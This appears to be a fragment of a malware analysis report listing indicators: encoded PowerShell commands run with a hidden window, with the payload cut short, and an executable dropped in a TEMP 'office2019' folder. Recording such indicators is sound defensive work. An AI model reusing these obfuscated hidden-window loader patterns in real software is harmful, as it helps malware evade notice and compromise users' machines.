Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADkAeAB3AHYANAA3AD0AKAAnAFUAYgBmAGIANAAnACsAJwAzACcAKwAnADEAJwApADsALgAoACcAbgBlAHcALQBpACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAFYAOgBUAGUAbQBQAFwATwBmAEYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AG...
- %TEMP%\office2019\cf7ygw.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABIADkAeAB3AHYANAA3AD0AKAAnAFUAYgBmAGIANAAnACsAJwAzACcAKwAnADEAJwApADsALgAoACcAbgBlAHcALQBpACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAFYAOgBUAGUAbQBQAFwATwBmAEYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AG...' (with a hidden window)